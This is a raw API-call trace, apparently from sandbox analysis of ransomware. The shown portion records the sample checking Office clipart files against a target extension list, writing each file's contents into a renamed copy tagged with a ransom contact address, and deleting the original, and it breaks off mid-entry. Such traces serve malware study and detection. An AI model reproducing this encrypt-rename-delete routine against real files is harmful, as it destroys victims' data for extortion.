lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.812] lstrlenW (lpString=".bz2") returned 4 [0184.812] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.812] lstrlenW (lpString=".7z") returned 3 [0184.812] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.812] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107502.WMF") returned 68 [0184.812] lstrlenW (lpString=".dbf") returned 4 [0184.812] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.812] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107502.WMF") returned 68 [0184.812] lstrlenW (lpString=".1cd") returned 4 [0184.812] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.812] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107502.WMF") returned 68 [0184.812] lstrlenW (lpString=".jpg") returned 4 [0184.812] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.812] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0184.812] lstrlenW (lpString="J0107708.WMF") returned 12 [0184.812] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107708.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107708.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0184.813] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x325ff14 | out: lpFileSize=0x325ff14*=4808) returned 1 [0184.813] CloseHandle (hObject=0x378) returned 1 [0184.813] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107708.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107708.wmf")) returned 0x220 [0184.813] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107708.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107708.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.813] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107708.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107708.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0184.813] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.813] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.814] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107708.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107708.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0184.814] GetLastError () returned 0x0 [0184.814] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x12c8, lpOverlapped=0x0) returned 1 [0184.940] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x12d0, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x12d0, lpOverlapped=0x0) returned 1 [0184.942] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0184.942] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0184.942] SetEndOfFile (hFile=0x37c) returned 1 [0184.942] CloseHandle (hObject=0x37c) returned 1 [0184.942] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.942] SetEndOfFile (hFile=0x378) returned 1 [0184.943] CloseHandle (hObject=0x378) returned 1 [0184.943] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107708.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0184.944] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107708.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107708.wmf")) returned 1 [0184.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107708.WMF") returned 68 [0184.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107708.WMF") returned 68 [0184.944] lstrlenW (lpString=".doc") returned 4 [0184.944] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.944] lstrlenW (lpString=".docx") returned 5 [0184.944] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0184.944] lstrlenW (lpString=".pdf") returned 4 [0184.944] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.944] lstrlenW (lpString=".xls") returned 4 [0184.944] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.944] lstrlenW (lpString=".xlsx") returned 5 [0184.944] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0184.945] lstrlenW (lpString=".ppt") returned 4 [0184.945] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107708.WMF") returned 68 [0184.945] lstrlenW (lpString=".zip") returned 4 [0184.945] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.945] lstrlenW (lpString=".rar") returned 4 [0184.945] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.945] lstrlenW (lpString=".bz2") returned 4 [0184.945] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.945] lstrlenW (lpString=".7z") returned 3 [0184.945] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107708.WMF") returned 68 [0184.945] lstrlenW (lpString=".dbf") returned 4 [0184.945] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107708.WMF") returned 68 [0184.945] lstrlenW (lpString=".1cd") returned 4 [0184.945] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107708.WMF") returned 68 [0184.946] lstrlenW (lpString=".jpg") returned 4 [0184.946] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107708.WMF") returned 68 [0184.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107708.WMF") returned 68 [0184.946] lstrlenW (lpString=".doc") returned 4 [0184.946] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.946] lstrlenW (lpString=".docx") returned 5 [0184.946] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0184.946] lstrlenW (lpString=".pdf") returned 4 [0184.946] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.946] lstrlenW (lpString=".xls") returned 4 [0184.946] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.946] lstrlenW (lpString=".xlsx") returned 5 [0184.946] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0184.946] lstrlenW (lpString=".ppt") returned 4 [0184.946] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107708.WMF") returned 68 [0184.946] lstrlenW (lpString=".zip") returned 4 [0184.946] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.946] lstrlenW (lpString=".rar") returned 4 [0184.946] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.946] lstrlenW (lpString=".bz2") returned 4 [0184.946] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.946] lstrlenW (lpString=".7z") returned 3 [0184.946] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107708.WMF") returned 68 [0184.946] lstrlenW (lpString=".dbf") returned 4 [0184.946] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107708.WMF") returned 68 [0184.947] lstrlenW (lpString=".1cd") returned 4 [0184.947] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107708.WMF") returned 68 [0184.947] lstrlenW (lpString=".jpg") returned 4 [0184.947] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.947] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0184.947] lstrlenW (lpString="J0107718.WMF") returned 12 [0184.947] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107718.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107718.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0184.948] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x325ff14 | out: lpFileSize=0x325ff14*=3800) returned 1 [0184.948] CloseHandle (hObject=0x378) returned 1 [0184.948] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107718.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107718.wmf")) returned 0x220 [0184.948] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107718.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107718.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.948] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107718.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107718.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0184.948] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.948] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.948] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107718.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107718.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0184.949] GetLastError () returned 0x0 [0184.949] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0xed8, lpOverlapped=0x0) returned 1 [0184.951] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xee0, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xee0, lpOverlapped=0x0) returned 1 [0184.955] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0184.955] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0184.955] SetEndOfFile (hFile=0x37c) returned 1 [0184.955] CloseHandle (hObject=0x37c) returned 1 [0184.955] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.955] SetEndOfFile (hFile=0x378) returned 1 [0184.956] CloseHandle (hObject=0x378) returned 1 [0184.956] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107718.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0184.957] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107718.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107718.wmf")) returned 1 [0184.957] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107718.WMF") returned 68 [0184.957] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107718.WMF") returned 68 [0184.957] lstrlenW (lpString=".doc") returned 4 [0184.957] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.957] lstrlenW (lpString=".docx") returned 5 [0184.957] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0184.957] lstrlenW (lpString=".pdf") returned 4 [0184.957] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.957] lstrlenW (lpString=".xls") returned 4 [0184.957] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.957] lstrlenW (lpString=".xlsx") returned 5 [0184.957] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0184.957] lstrlenW (lpString=".ppt") returned 4 [0184.957] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.957] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107718.WMF") returned 68 [0184.958] lstrlenW (lpString=".zip") returned 4 [0184.958] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.958] lstrlenW (lpString=".rar") returned 4 [0184.958] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.958] lstrlenW (lpString=".bz2") returned 4 [0184.958] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.958] lstrlenW (lpString=".7z") returned 3 [0184.958] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.958] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107718.WMF") returned 68 [0184.958] lstrlenW (lpString=".dbf") returned 4 [0184.958] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.958] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107718.WMF") returned 68 [0184.958] lstrlenW (lpString=".1cd") returned 4 [0184.958] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.958] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107718.WMF") returned 68 [0184.958] lstrlenW (lpString=".jpg") returned 4 [0184.958] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.958] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107718.WMF") returned 68 [0184.958] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107718.WMF") returned 68 [0184.958] lstrlenW (lpString=".doc") returned 4 [0184.958] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.958] lstrlenW (lpString=".docx") returned 5 [0184.958] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0184.958] lstrlenW (lpString=".pdf") returned 4 [0184.958] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.958] lstrlenW (lpString=".xls") returned 4 [0184.958] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.959] lstrlenW (lpString=".xlsx") returned 5 [0184.959] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0184.959] lstrlenW (lpString=".ppt") returned 4 [0184.959] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.959] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107718.WMF") returned 68 [0184.959] lstrlenW (lpString=".zip") returned 4 [0184.959] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.959] lstrlenW (lpString=".rar") returned 4 [0184.959] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.959] lstrlenW (lpString=".bz2") returned 4 [0184.959] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.959] lstrlenW (lpString=".7z") returned 3 [0184.959] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.959] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107718.WMF") returned 68 [0184.959] lstrlenW (lpString=".dbf") returned 4 [0184.959] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.959] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107718.WMF") returned 68 [0184.959] lstrlenW (lpString=".1cd") returned 4 [0184.959] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.959] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107718.WMF") returned 68 [0184.959] lstrlenW (lpString=".jpg") returned 4 [0184.959] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.959] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0184.960] lstrlenW (lpString="J0107722.WMF") returned 12 [0184.960] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107722.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107722.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0184.960] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x325ff14 | out: lpFileSize=0x325ff14*=8260) returned 1 [0184.960] CloseHandle (hObject=0x378) returned 1 [0184.961] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107722.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107722.wmf")) returned 0x220 [0184.961] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107722.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107722.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.961] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107722.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107722.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0184.961] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.961] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.961] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107722.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107722.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0184.962] GetLastError () returned 0x0 [0184.962] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x2044, lpOverlapped=0x0) returned 1 [0184.983] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x2050, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x2050, lpOverlapped=0x0) returned 1 [0184.984] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0184.985] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0184.985] SetEndOfFile (hFile=0x37c) returned 1 [0184.985] CloseHandle (hObject=0x37c) returned 1 [0184.985] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.985] SetEndOfFile (hFile=0x378) returned 1 [0184.986] CloseHandle (hObject=0x378) returned 1 [0184.986] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107722.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0184.986] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107722.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107722.wmf")) returned 1 [0184.986] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107722.WMF") returned 68 [0184.987] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107722.WMF") returned 68 [0184.987] lstrlenW (lpString=".doc") returned 4 [0184.987] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.987] lstrlenW (lpString=".docx") returned 5 [0184.987] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0184.987] lstrlenW (lpString=".pdf") returned 4 [0184.987] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.987] lstrlenW (lpString=".xls") returned 4 [0184.987] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.987] lstrlenW (lpString=".xlsx") returned 5 [0184.987] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0184.987] lstrlenW (lpString=".ppt") returned 4 [0184.987] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.987] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107722.WMF") returned 68 [0184.987] lstrlenW (lpString=".zip") returned 4 [0184.987] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.987] lstrlenW (lpString=".rar") returned 4 [0184.987] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.987] lstrlenW (lpString=".bz2") returned 4 [0184.987] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.987] lstrlenW (lpString=".7z") returned 3 [0184.987] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.987] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107722.WMF") returned 68 [0184.987] lstrlenW (lpString=".dbf") returned 4 [0184.987] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.987] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107722.WMF") returned 68 [0184.987] lstrlenW (lpString=".1cd") returned 4 [0184.987] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.987] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107722.WMF") returned 68 [0184.987] lstrlenW (lpString=".jpg") returned 4 [0184.988] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.988] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107722.WMF") returned 68 [0184.988] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107722.WMF") returned 68 [0184.988] lstrlenW (lpString=".doc") returned 4 [0184.988] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.988] lstrlenW (lpString=".docx") returned 5 [0184.988] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0184.988] lstrlenW (lpString=".pdf") returned 4 [0184.988] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.988] lstrlenW (lpString=".xls") returned 4 [0184.988] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.988] lstrlenW (lpString=".xlsx") returned 5 [0184.988] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0184.988] lstrlenW (lpString=".ppt") returned 4 [0184.988] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.988] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107722.WMF") returned 68 [0184.988] lstrlenW (lpString=".zip") returned 4 [0184.988] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.988] lstrlenW (lpString=".rar") returned 4 [0184.988] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.988] lstrlenW (lpString=".bz2") returned 4 [0184.988] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.988] lstrlenW (lpString=".7z") returned 3 [0184.988] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.988] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107722.WMF") returned 68 [0184.988] lstrlenW (lpString=".dbf") returned 4 [0184.988] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.988] lstrlenW (lpString="C:\\Program Files\\Microsoft 